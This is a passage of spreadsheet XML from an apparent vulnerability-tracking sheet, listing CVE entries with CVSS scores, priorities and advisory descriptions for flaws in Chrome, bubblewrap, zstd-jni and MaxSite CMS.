          <t>CVE-2026-87489</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr"/>
      <c r="Q210" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>Memory corruption in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87489</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87536</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr"/>
      <c r="Q211" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87536</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87542</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr"/>
      <c r="Q212" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>Use after free in Input in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87542</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87569</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr"/>
      <c r="Q213" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Views in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87569</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87570</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr"/>
      <c r="Q214" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to bypass site isolation via a crafted file. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87570</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87579</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr"/>
      <c r="Q215" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebRTC in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87579</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87585</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr"/>
      <c r="Q216" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>Double free in PDFium in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted PDF file. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87585</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87587</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr"/>
      <c r="Q217" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87587</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87588</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr"/>
      <c r="Q218" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>Use after free in Chromecast in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87588</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87612</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr"/>
      <c r="Q219" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87612</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87617</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr"/>
      <c r="Q220" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87617</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87625</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr"/>
      <c r="Q221" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code inside the sandbox via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87625</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87636</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr"/>
      <c r="Q222" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>Type confusion in XML in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87636</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87766</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr"/>
      <c r="Q223" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in bubblewrap. During sandbox setup, creating files or directories under the new root can follow a parent symlink onto the host via /oldroot, writing attacker-chosen paths outside the sandbox as the launching user. This happens before the sandboxed process starts. This issue is GHSA-pxhw-h44j-8pfx. It is fixed in bubblewrap 0.12.0.</t>
        </is>
      </c>
      <c r="S223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87766</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87795</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr"/>
      <c r="Q224" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>zstd-jni versions before 1.5.7-14 fail to validate offset and length parameters in the ZstdDictCompress constructor, allowing out-of-bounds memory reads. Attackers can supply untrusted offset or length values to read native heap memory into the compression dictionary, typically causing JVM crashes.</t>
        </is>
      </c>
      <c r="S224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87795</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87823</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr"/>
      <c r="Q225" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 performs 32-bit signed bounds checks on three direct-ByteBuffer frame-size native methods, allowing out-of-bounds memory reads via negative or overflowing offsets. Attackers can supply negative offset values near Integer.MIN_VALUE to read unmapped memory, causing JVM termination or extracting arbitrary frame size data from unintended memory locations.</t>
        </is>
      </c>
      <c r="S225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87823</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87927</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr"/>
      <c r="Q226" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS through 109.6 contains a local file inclusion vulnerability in the ajax and require-maxsite dispatchers that allows unauthenticated attackers to execute privileged handler files by supplying base64-encoded path traversal sequences. Attackers can bypass path validation checks and execute admin-gated handler actions without authentication to access sensitive functionality.</t>
        </is>
      </c>
      <c r="S226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87927</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54355</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
